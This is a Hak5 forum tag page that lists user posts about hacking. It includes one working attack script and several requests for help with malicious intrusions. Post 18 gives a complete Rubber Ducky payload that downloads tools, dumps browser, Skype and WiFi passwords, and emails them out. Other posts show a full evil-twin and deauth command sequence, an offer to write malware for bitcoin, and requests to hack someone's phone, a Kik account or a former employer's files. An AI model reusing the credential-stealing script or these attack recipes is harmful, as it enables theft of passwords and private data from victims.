Jump to content

Search the Community

Showing results for tags 'Hack'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. hi guys! i am new member and i found site scam, them scam a lot of ppl in my coutry 1: them use same 8 server and buy than 500 domain to scam 2,3 month scammer delete domain and use new domain to scam they go facebook or twitter shill user come site and shill them deposit money to buy some product and then user got profit then withdraw and them not send money 3: they use source code thinkadmin, thinkphp from china 4 i dont know hacking. i research a lot of time but i cannot bypass admin page i big sad and find anyway can access admin page, even they change password i still find password to login i want login to destroy delete and warning ppl scam site i really hope you goods guys can help me, ppl alway ask me money but i dont hae, just hope you guys can help me some site: and have a lot of other site can anyone know hack pls dm me telegram @
  2. Hi guys, I am new to this forum and after looking around nearly everywhere, I am unable to find an answer to this question and hoped you could help. After scanning a website with nkito, the result showed that it was vulnerable to the sips vulnerability and that I could login as admin without knowing the password. However, after inputting the information in the url, I was simply redirected to the login page which also contains a captcha. Is there anyway I can still exploit the vulnerability such as using Metasploit?? Please help
  3. Hello, so i recently got challenged by my friend to beat him on something called readtheory and i kinda saw him cheat thru some code or something so i wonder if any of you guys know how to find answers in codes. there is multiple answers and i want to know how to find the correct one. Pls helperino <3 :D
  4. Hi guys, very new to this, i have a very specific file I am looking for. I used to work for a company where one of my projects was developing a new design spreadsheet for design calculations of our core product range. I ran a team of engineers amd we came up with a template which was totally awesome. Then IT got involved and locked it down so only two people had access and I wasn’t one of them (was considered a need-to-know basis). Then I left the company, and a few years later decided to start my own. I’m looking for a way to obtain a copy of that spreadsheet and the username/password for it. I have physical access (after hours) to one of the users machines via an insider, but thats about it. I can’t remember what the file is called and don’t know where it’s currently stored on the network. What would be the best way to achieve such a task? It would tale me thousands of hours to rewrite the whole thing, researching papers, books, the whole thing.
  5. When I open a file for a game... There is some hidden one's that I can't see with the folder open. But through cmd there are things I can see in cmd but can't see in folders.
  6. Hi! If anyone needs good password list for bruteforce hacking - bigpasswordlist.com I've downloaded all biggest lists and merged them together. List is good.
  7. Hi guys, I have questions. I have pin and ssid of a hiden network but i don't know the way to find key? Thank's
  8. An extremely asked theme is how to hack an wifi network easily, today i has the answer to you question totally free. Today is possible to attach a kali linux to your windows totally free and by a quickly mode, using Virtual Box the work is dis complicated. In the link bellow i taught how to hack any wifi with any operational system. You can ask for help in the post comments... Click here to go to article
  9. So recently i have purchased a BadUsb ATMEGA32U4 USB as one in this image https://www.ebay.com/p/MicroSD-Virtual-Keyboard-Badusb-USB-TF-Memory-Keboard-Atmega32u4-Module/13011086107 and when i plugged it in it seemed to work fine until i uploaded a script to it and after that itll only turn on when i press the button on the usb i want to reset the usb so i can use it again
  10. can someone hack a kik account that is 2214 days old and retrieve all of the data on it that was ever sent or received?
  11. There are several kinds of attacks for Wifi Hacking. However, this tutorial about how to hack wifi i was checking. However, later when i tried it with Virtual machine on my windows 10, it didn't actually work. Is it happening because of Virtual Machine! should i install Kali Linux OS to make it fully work!
  12. I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name) Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" Deauthorizing clients on another terminal aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Configuring nano /etc/dhcp/dhcpd.conf authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200; } Installing bridging utilities apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Bridging interface root@kali:~# brctl addbr evil \\Name of the bridge i made root@kali:~# brctl addif evil eth0 \\my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~# ifconfig at0 0.0.0.0 up root@kali:~# ifconfig evil up Starting DHCP server root@kali:~# systemctl start smbd.service root@kali:~# dhclient evil root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0 Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server. /etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service. IP gateway root@kali:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
  13. Hello people, I was recently doing some work with those VEX Robotics wireless control robots and I had some ideas about packet sniffing attacks, replay attacks, man in the middle attacks, and de-authentication attacks. The robots use the Vex cortex, which has a wireless adapter through a USB port, it says that is is 2.4 GHz, and another USB wireless adapter is plunged into a controller, like a joystick. My school did a competition with these robots, and it ended last week, now we are doing another thing just as a school, they said we were doing battle bots. When I did some research I hadn't seen anybody do anything like this and I though I would look into it. When I was doing research I found that, the robots don't use any encryption it is end to end, the controllers or create there own network an access point that the robot connects to, the network it creates is hidden it does not broadcast its SSID and has to be pared with the cortex, they are 2.4 GHz, they all have independent channels or mac addresses (many can operate at the same time without interference). The first thing I though of would be a deauth attack, where I would send out deauth frames to disconnect their robot from the controller from the cortex leaving their robot powerless, I was tinging I could do this with Aircrack-ng, put my wireless card into monitor mode with airmon-ng, find the mac address and channel of the robot with airodump-ng, deauth with aireplay-ng. The next attack I though of was if I could intercept packets from the remote to the cortex and either replay them to keep doing an operation or send in my own by finding out what commands correlated to what packets and injecting them while impersonating the robot. I have not done much with packet sniffing/replay/injection if anybody knows anything on how I could do that? or if anybody has done anything with these robots? or if you have any ideas on wireless attacks? I am all ears and I would love help and suggestions, this seems like a really cool project. I would love to hear your thoughts, thank you
  14. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  15. Iam so curious to someone. I want know her more. Can i hack her iphone with wifi connection? or something else can i do? please help me
  16. I am not sure if this is the right bored to be talking about this I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins. It could do just about anything you want example: Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc pm me if your interested
  17. Hi everybody, I'm chatting on an IRC Website (That not allows simple users to connect by an IRC Client, but only Browsers ...). When spamming or flooding, I've been being banned with 3 Types of bans : 1. Banning the IP address (I simply Bypass this ban by rebooting my Wi-Fi Router because I have a dynamic IP address); 2. Banning the MAC address (I'm again capable of bypassing this by changing my MAC address with the freeware '' TMAC Changer '' ); 3. Banning the Browser connection (Here comes my problem, in other terms, even if I do a clean uninstall / install of my browser '' After changing IP + MAC addresses '' and keep changing my browsers Mozilla, Chrome, Chromium, Safari, Opera; I keep getting banned every-time ... So when I have no browser left to install, I MUST WIPE + FORMAT my PC to connect again to this site). My question is as so : what is the specific parameter in the browser that allow Operators and Admins in this IRC Website to catch me every-time, and how can I bypass this ?! Thank you in advance, and I hope you can help me !
  18. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & ChromePass.exe /stext logs\ChromePass.txt & OperaPassView.exe /stext logs\OperaPassView.txt STRING & PasswordFox.exe /stext logs\PasswordFox.txt & SkypeLogView.exe /stext logs\SkypeLogView.txt & WebBrowserPassView.exe /stext logs\WebBrowserPassView.txt & WirelessKeyView.exe /stext logs\WirelessKeyView.txt & powershell -ExecutionPolicy Bypass %TEMP%\tools\file.ps1 STRING & cd %TEMP% & del tools.zip & exit ENTER STRING Add-Type -AssemblyName System.IO.Compression.FileSystem ENTER STRING function Unzip ENTER STRING { ENTER STRING param([string]$zipfile, [string]$outpath) ENTER STRING [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) ENTER STRING } ENTER STRING wget "http://pathtotools.zip/Tools.zip" -OutFile $ENV:temp\tools.zip ENTER STRING Unzip $ENV:temp\tools.zip $ENV:temp ENTER STRING cd $ENV:temp\tools ENTER STRING mkdir logs ENTER STRING exit ENTER Link to the tools: https://www.mediafire.com/file/ddcur1ebc3fbvb5/Tools.zip HOW TO SET IT UP ------------------------------------------------------- Download the Tools.zip file and extract it. Then, open file.ps1 with notepad or whatever program you like and changer "YourUsername" to you username (i.e bertfast) and "YourPassword" to your password. Then change "receiver" to whoever you want to send the logs to. I MADE IT WORK WITH GMAIL. I don't know if it works with other services. After that, zip the Tools folder (don't zip the files or it won't work). In the code above, change "http://pathtotools.zip/Tools.zip" to the path where you have hosted the zip file. Tested in Windows 10 x64. BIG thanks to MrGray for the original script. Also, big thanks to Nurrl. With Duckuino i converted the code above to make it work with my arduino (I don't own a rubber ducky, sorry ) Please tell me if it worked or not and the OS you are using
  19. when i plug my USB rubber ducky into the USB slot and push the black button the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if i don't have any SD card in the slot. i am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard if anyone has the factory hex i would appreciate if you send it to me thanks
  20. Interesting research worth a read and watch. I think the devices used are around the $185 mark. type RX band- TX band- Function Application width width UT-100A 6-8 MHz 2-8 MHz Rx-Tx General UT-100B 2-4 MHz 2-8 MHz Rx-Tx amateur UT-100C - 2-8 MHz Tx General UT-100D 2-4 MHz - Rx amateur http://www.idealez.com/hides/home/en_US/ http://www.ebay.com/sch/hides168/m.html?item=322470042239&hash=item4b14b65a7f%3Ag%3AGc4AAMXQVT9TBXWO&rt=nc&_trksid=p2047675.l2562
  21. BioBoss

    Old Online Game

    I found this game called graal online classic it's an online rpg, apparently its really old. It reminds me of old gb zelda. I've been messing around with it for a while doing simple hacks. But I'm curious has anyone else ever heard of it, its confusing at first but kinda fun. I'm looking into creating a hacked client or something but still looking for exploits. There seems to be a small loyal community around the game. anyway here's the link: http://classic.graalonline.com/ here's the form: http://www.graalians.com/forums/
  22. Hello, I know it will be an ubsurd request because this is a hacking forum :) I'm a developer and I'm making my money by selling a program, but I realized that someone cracked my program and distributing it. I'm currently using WinLicense for encryption. Do you know a better program for license and/or encryption?
  23. Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.
  24. i want to use my android device for pentesting networks & wifi my device is Xiaomi redmi note 3 SD i tried to flash nethunter all scripts are working fine but i think i am having kernel issue thats why my external adapter is not working lsusb command is showing that it is attached but ifconfig or anything command are not showing its interface my adapter is TPLINK WN722n can anyone help me in either developing a kernel or can suggest anyother way to convert my device to pentesting toolkit
  25. Hi everybody! im trying to use wordpress long password dos auxiliary in metasploit ... but it keeps getting some bad ass error about a month ago i was still using ubuntu and this module was working so god ... but since i moved in to kali im having trouble with it [Forgive me for my fucked up english] these are the error(s): [*] Checking if user "admin" exists... [+] Username "admin" is valid [-] Auxiliary failed: ActiveRecord::StatementInvalid PG::InvalidTextRepresentation: ERROR: invalid input syntax for type inet: "myhost(that i set for rhost)" : SELECT "hosts".* FROM "hosts" WHERE "hosts"."address" = $1 AND "hosts"."workspace_id" = $2 ORDER BY "hosts"."id" ASC LIMIT 1 [-] Call stack: [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `exec_prepared' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `block in exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:484:in `block in log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/notifications/instrumenter.rb:20:in `instrument' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:478:in `log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:601:in `exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:585:in `execute_and_clear' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql/database_statements.rb:160:in `exec_query' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:356:in `select' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:32:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/query_cache.rb:70:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/querying.rb:39:in `find_by_sql' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:639:in `exec_queries' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:515:in `load' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:243:in `to_a' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:500:in `find_nth_with_limit' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:484:in `find_nth' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:127:in `first' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:155:in `first_or_create' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:555:in `create_credential_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:423:in `create_credential_origin_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:353:in `create_credential_origin' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:117:in `create_credential' [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:88:in `report_cred' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:100:in `user_exists' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:119:in `run' [*] Auxiliary module execution completed
×
×
  • Create New...